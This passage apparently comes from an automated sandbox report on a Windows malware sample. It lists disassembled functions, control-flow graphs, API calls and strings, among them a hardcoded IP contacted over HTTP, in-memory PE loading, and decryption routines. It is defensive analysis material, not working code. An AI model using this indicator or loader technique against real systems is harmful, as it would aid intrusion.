                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                        • API String ID: 606935701-1501174972
                        • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                        • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                        • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                        • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99
                        Function 04788464 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1354 4788464-478847d 1355 478847f-4788481 1354->1355 1356 4788488-4788494 CreateToolhelp32Snapshot 1355->1356 1357 4788483 1355->1357 1358 47884a4-47884b1 Module32First 1356->1358 1359 4788496-478849c 1356->1359 1357->1356 1360 47884ba-47884c2 1358->1360 1361 47884b3-47884b4 call 4788123 1358->1361 1359->1358 1364 478849e-47884a2 1359->1364 1365 47884b9 1361->1365 1364->1355 1364->1358 1365->1360
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0478848C
                        • Module32First.KERNEL32(00000000,00000224), ref: 047884AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4780000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFirstModule32SnapshotToolhelp32
                        • String ID:
                        • API String ID: 3833638111-0
                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction ID: 5687d654b8fa294670f3295f60f5c255fd154a4ce1b3eb07731fd8e977f7c2eb
                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction Fuzzy Hash: 55F0F632140715AFE7203FF59C8CB6E72E8FF48325F51052CE646952C0DB74F80546A2
                        Function 004087E0 Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1370 4087e0-408807 call 402460 * 2 call 405a50 1376 40880c-408816 call 4106ab 1370->1376
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: mixtwo$nosub
                        • API String ID: 3472027048-187875987
                        • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                        • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                        • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                        • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF
                        Function 00401830 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                          • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                        Strings
                        • http://, xrefs: 00401EF4, 004021D3
                        • text, xrefs: 00401B8F
                        • GET, xrefs: 004020E7
                        • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                        • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                        • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                        • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                        • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                        • API String ID: 2146599340-4172842843
                        • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                        • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                        • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                        • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4
                        Function 0493003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 728 493003c-4930047 729 4930049 728->729 730 493004c-4930263 call 4930a3f call 4930e0f call 4930d90 VirtualAlloc 728->730 733 493004a 729->733 746 4930265-4930289 call 4930a69 730->746 747 493028b-4930292 730->747 733->733 752 49302ce-49303c2 VirtualProtect call 4930cce call 4930ce7 746->752 749 49302a1-49302b0 747->749 751 49302b2-49302cc 749->751 749->752 751->749 758 49303d1-49303e0 752->758 759 49303e2-4930437 call 4930ce7 758->759 760 4930439-49304b8 VirtualFree 758->760 759->758 762 49305f4-49305fe 760->762 763 49304be-49304cd 760->763 766 4930604-493060d 762->766 767 493077f-4930789 762->767 765 49304d3-49304dd 763->765 765->762 771 49304e3-4930505 LoadLibraryA 765->771 766->767 772 4930613-4930637 766->772 769 49307a6-49307b0 767->769 770 493078b-49307a3 767->770 773 49307b6-49307cb 769->773 774 493086e-49308be LoadLibraryA 769->774 770->769 775 4930517-4930520 771->775 776 4930507-4930515 771->776 777 493063e-4930648 772->777 778 49307d2-49307d5 773->778 781 49308c7-49308f9 774->781 779 4930526-4930547 775->779 776->779 777->767 780 493064e-493065a 777->780 782 49307d7-49307e0 778->782 783 4930824-4930833 778->783 784 493054d-4930550 779->784 780->767 785 4930660-493066a 780->785 787 4930902-493091d 781->787 788 49308fb-4930901 781->788 789 49307e2 782->789 790 49307e4-4930822 782->790 786 4930839-493083c 783->786 791 49305e0-49305ef 784->791 792 4930556-493056b 784->792 793 493067a-4930689 785->793 786->774 794 493083e-4930847 786->794 788->787 789->783 790->778 791->765 797 493056f-493057a 792->797 798 493056d 792->798 795 4930750-493077a 793->795 796 493068f-49306b2 793->796 801 493084b-493086c 794->801 802 4930849 794->802 795->777 803 49306b4-49306ed 796->803 804 49306ef-49306fc 796->804 799 493059b-49305bb 797->799 800 493057c-4930599 797->800 798->791 812 49305bd-49305db 799->812 800->812 801->786 802->774 803->804 806 493074b 804->806 807 49306fe-4930748 804->807 806->793 807->806 812->784
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0493024D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction ID: 08bb6fa7d2181586b89baf2134dc6309017076f57fa03d49e1baa52cb838d437
                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction Fuzzy Hash: DB528974A00229DFDB64CF58C984BACBBB1BF09305F1480E9E94DAB355DB30AA85DF14
                        Function 00405A50 Relevance: 11.2, APIs: 2, Strings: 5, Instructions: 678sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 813 405a50-406330 call 410822 call 4106e2 Sleep call 402760 * 2 call 403ab0 call 408ed0 call 408d80 * 3 call 406c40 call 408920 call 402460 call 408a70 call 402390 call 406ee0 call 4088e0 call 402460 call 408a70 call 402390 861 406404-40642f call 407290 call 4088e0 call 402460 call 408a70 call 402390 813->861 862 406336-4063ad call 406f60 call 4088e0 call 402460 call 4023e0 call 402390 call 406ff0 call 408900 call 402460 call 4023e0 call 402390 call 407070 call 408940 call 402460 call 408a70 call 402390 813->862 884 4064f3-40651e call 407630 call 4088c0 call 402460 call 408a70 call 402390 861->884 885 406435-4064ac call 407310 call 4088e0 call 402460 call 4023e0 call 402390 call 407390 call 408900 call 402460 call 4023e0 call 402390 call 407410 call 408940 call 402460 call 408a70 call 402390 861->885 952 4063cc-4063f7 call 407180 call 408940 call 402460 call 408a70 call 402390 862->952 953 4063af call 407100 862->953 918 406524-4065c1 call 4076b0 call 408920 call 402460 call 4023e0 call 402390 call 407730 call 408900 call 402460 call 4023e0 call 402390 call 4077b0 call 4088c0 call 402460 call 4023e0 call 402390 call 407830 call 4089c0 call 402460 call 408a70 call 402390 884->918 919 406608-406633 call 407a50 call 408890 call 402460 call 408a70 call 402390 884->919 1019 4064b8-4064e3 call 407520 call 408940 call 402460 call 408a70 call 402390 885->1019 1020 4064ae-4064b3 call 4074a0 885->1020 1152 4065c3-4065c8 call 4078c0 918->1152 1153 4065cd-4065f8 call 407940 call 4089c0 call 402460 call 408a70 call 402390 918->1153 966 4066b3-4066de call 407c70 call 408940 call 402460 call 408a70 call 402390 919->966 967 406635-4066ae call 407ae0 call 408900 call 402460 call 4023e0 call 402390 call 407b60 call 408940 call 402460 call 4023e0 call 402390 call 407bf0 call 4088c0 call 402460 call 4023e0 call 402390 919->967 1016 40687d-4069df call 4017a0 call 4083f0 call 408940 call 402460 call 408370 call 408920 call 402460 call 4082d0 call 4089a0 call 402460 call 408da0 call 408e00 call 408eb0 call 408e00 call 408eb0 call 408e00 call 402390 * 8 952->1016 1022 4063fd-406402 call 407210 952->1022 965 4063b4-4063c7 call 408920 call 402460 953->965 992 40686f-406878 call 4023e0 call 402390 965->992 1031 4066e0-406759 call 407d00 call 408900 call 402460 call 4023e0 call 402390 call 407d80 call 408920 call 402460 call 4023e0 call 402390 call 407e00 call 4088c0 call 402460 call 4023e0 call 402390 966->1031 1032 40675e-406789 call 407e80 call 408970 call 402460 call 408a70 call 402390 966->1032 967->1016 992->1016 1251 4069e5-4069fe call 402350 call 4021d0 1016->1251 1019->1016 1089 4064e9-4064ee call 4075b0 1019->1089 1020->965 1022->965 1031->1016 1098 40678b-4067dc call 407f10 call 408900 call 402460 call 4023e0 call 402390 call 407fd0 call 4088c0 call 402460 call 4023e0 call 402390 call 408050 1032->1098 1099 4067de-406809 call 4080d0 call 4088c0 call 402460 call 408a70 call 402390 1032->1099 1089->884 1223 40685c-40686c call 4088c0 call 402460 1098->1223 1099->1016 1166 40680b-406857 call 408150 call 408900 call 402460 call 4023e0 call 402390 call 4081d0 call 408920 call 402460 call 4023e0 call 402390 call 408250 1099->1166 1152->1153 1153->1016 1210 4065fe-406603 call 4079d0 1153->1210 1166->1223 1210->919 1223->992 1256 406a00-406a23 call 402210 call 402460 call 4025e0 1251->1256 1257 406a3e-406a45 Sleep 1251->1257 1256->1257 1264 406a47-406a9c call 402390 call 408c80 * 3 call 404f70 1256->1264 1257->1251
                        APIs
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,8F925C9F), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                        • API String ID: 2563648476-311857291
                        • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                        • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                        • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                        • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9
                        Function 00401E50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1274 401e50-401e9e 1275 401ea0-401ea5 1274->1275 1275->1275 1276 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 1275->1276 1289 4021a3-4021c0 call 409a17 1276->1289 1290 40217b-402187 1276->1290 1292 402199-4021a0 call 409b7c 1290->1292 1293 402189-402197 1290->1293 1292->1289 1293->1292 1295 4021c8-4021f9 call 40cfef call 401e50 1293->1295
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: http://
                        • API String ID: 0-1121587658
                        • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                        • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                        • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                        • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94
                        Function 005F69E9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1303 5f69e9-5fa8d9 LoadLibraryA
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5f2000_file.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: es;o
                        • API String ID: 1029625771-2595528149
                        • Opcode ID: 3c383c9b308b16e1f4651073d0de9d6d1e2a8647851b9c09375238c09c6eac12
                        • Instruction ID: 05737795622d09aa9469c8c2aceab53008096c5e7af60425bf56120e45e98c6b
                        • Opcode Fuzzy Hash: 3c383c9b308b16e1f4651073d0de9d6d1e2a8647851b9c09375238c09c6eac12
                        • Instruction Fuzzy Hash: E3012CB150C305EFD744AF18D99187ABBE4BF98710F118C2DE6CA82240E639A855DB53
                        Function 005F79BF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1310 5f79bf-5f8de6 LoadLibraryA 1314 5fa16c-5fa8d9 1310->1314
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5f2000_file.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: es;o
                        • API String ID: 1029625771-2595528149
                        • Opcode ID: 4fac86a9b698e4ff8a9acfc36d715c2d3a8e1d36c6c44670dc176a1b2d45ed27
                        • Instruction ID: ade0538d9a7bacfbc6e3f8858a89edd961b525aaa45877339a460b1a8ed0d50d
                        • Opcode Fuzzy Hash: 4fac86a9b698e4ff8a9acfc36d715c2d3a8e1d36c6c44670dc176a1b2d45ed27
                        • Instruction Fuzzy Hash: 1601E1B110C705EFD7409F14D98187ABBE8FF98710F258C2DE6CA86600E6399891DB53
                        Function 00413CB9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1316 413cb9-413cc5 1317 413cf7-413d02 call 40d0dd 1316->1317 1318 413cc7-413cc9 1316->1318 1326 413d04-413d06 1317->1326 1319 413ce2-413cf3 RtlAllocateHeap 1318->1319 1320 413ccb-413ccc 1318->1320 1322 413cf5 1319->1322 1323 413cce-413cd5 call 412473 1319->1323 1320->1319 1322->1326 1323->1317 1328 413cd7-413ce0 call 4116b2 1323->1328 1328->1317 1328->1319
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 5(@
                        • API String ID: 1279760036-4133491027
                        • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                        • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                        • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                        • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED
                        Function 005F593A Relevance: 3.1, APIs: 2, Instructions: 101registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1331 5f593a-5fa2d2 1334 5fa2fb-5fa316 RegOpenKeyA 1331->1334 1335 5fa2d4-5fa2ef RegOpenKeyA 1331->1335 1337 5fa32e-5fa371 1334->1337 1338 5fa318-5fa322 1334->1338 1335->1334 1336 5fa2f1 1335->1336 1336->1334 1340 5fa37d-5fa38b 1337->1340 1341 5fa373 1337->1341 1338->1337 1343 5fa38d 1340->1343 1344 5fa397-5fa39e 1340->1344 1341->1340 1343->1344 1345 5fa3a4-5fa3ab 1344->1345 1346 5fa3b1 1344->1346 1345->1346 1347 5f5d9d-5f5da4 1345->1347 1346->1346 1348 5f5daa-5f7da9 1347->1348 1349 5f90f6-5f9112 1347->1349
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FA2E7
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FA30E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5f2000_file.jbxd
                        Similarity
                        • API ID: Open
                        • String ID:
                        • API String ID: 71445658-0
                        • Opcode ID: f054e92b9f24112ca564e93f06c03a44ccbab9ef99715b21207328f48d40a540
                        • Instruction ID: 0d318ee54ee576bac4cc1a885cd08445ab75dfe4c9cda0be07aaf7eb1a336cd9
                        • Opcode Fuzzy Hash: f054e92b9f24112ca564e93f06c03a44ccbab9ef99715b21207328f48d40a540
                        • Instruction Fuzzy Hash: EA41A7B100824DDFEB11DF50C849BFE7FA9FF05314F14092ADA8186951DB7A1CA4DB5A
                        Function 04930E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1367 4930e0f-4930e24 SetErrorMode * 2 1368 4930e26 1367->1368 1369 4930e2b-4930e2c 1367->1369 1368->1369
                        APIs
                        • SetErrorMode.KERNEL32(00000400,?,?,04930223,?,?), ref: 04930E19
                        • SetErrorMode.KERNEL32(00000000,?,?,04930223,?,?), ref: 04930E1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction ID: cde5a3b3c13ea24342a81a9701624a15b179406e3d1d061124b4434b57ddea14
                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction Fuzzy Hash: 52D0123124512877D7103A94DC0DBCD7B1CDF05B63F008021FB0DD9080C770954046E5
                        Function 006F2834 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1379 6f2834-6f2843 call 6f2846 1382 6f2845 1379->1382 1383 6f27d0-6f27eb VirtualProtect call 6f27f3 1379->1383 1385 6f27f0 1383->1385
                        APIs
                        • VirtualProtect.KERNEL32(?), ref: 006F27E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000006F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6f2000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 0ae03f574ab2e6be7195a94f4c6116ca902f7c5f5c56b9f03bca25cc9fe11c1f
                        • Instruction ID: dcd013f7ad60e0d0ce55c304b0ad10ec738df8f234eba642a9e124a916921437
                        • Opcode Fuzzy Hash: 0ae03f574ab2e6be7195a94f4c6116ca902f7c5f5c56b9f03bca25cc9fe11c1f
                        • Instruction Fuzzy Hash: 92D02B3600C25F2FD740BFB484546DF3B63BB55361F000448F7000F652C5966810DB18
                        Function 006F27D0 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1386 6f27d0-6f27f0 VirtualProtect call 6f27f3
                        APIs
                        • VirtualProtect.KERNEL32(?), ref: 006F27E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.00000000006F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6f2000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 8d2ceabc0596330e0526589e1ef1eba347207cbf0515d3384f67739b79f55f78
                        • Instruction ID: e8be14f99b2dac587816ea691b27bc7e34d7134f21cf75728a97bb1e1b92deb3
                        • Opcode Fuzzy Hash: 8d2ceabc0596330e0526589e1ef1eba347207cbf0515d3384f67739b79f55f78
                        • Instruction Fuzzy Hash: A0C0123104C29F5DD751BEB4581978E3A529B56361F050598EA004F193C5951810D715
                        Function 04788123 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1389 4788123-478815d call 4788436 1392 47881ab 1389->1392 1393 478815f-4788192 VirtualAlloc call 47881b0 1389->1393 1392->1392 1395 4788197-47881a9 1393->1395 1395->1392
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04788174
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4780000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction ID: 1fa60e370d9ff9989d0afc0c1f463f637c3c2dbfac62dc2f7489f9d8fdd3caf2
                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction Fuzzy Hash: D0113C79A40208EFDB01EF98C985E98BBF5AF08750F458094F948AB361D771EA50DF81

                        Non-executed Functions

                        Function 00402EE0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 454COMMON
                        Download Yara Rule
                        APIs
                        • SetLastError.KERNEL32(0000000D), ref: 00402F02
                        • SetLastError.KERNEL32(000000C1), ref: 00402F44
                        Strings
                        • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                        • DOS header is not valid!, xrefs: 00402F32
                        • Section alignment invalid!, xrefs: 00402FC7
                        • ERROR_OUTOFMEMORY!, xrefs: 00403062
                        • DOS header size is not valid!, xrefs: 00402F71
                        • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                        • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                        • Size is not valid!, xrefs: 00402F08
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast
                        • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                        • API String ID: 1452528299-2436911586
                        • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                        • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                        • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                        • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
                        Function 004035D0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,8F925C9F), ref: 00403650
                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                        • GetLastError.KERNEL32 ref: 004036E8
                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                        • GetLastError.KERNEL32 ref: 0040371A
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                        • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                        Strings
                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                        • API String ID: 3761881897-63410773
                        • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                        • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                        • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
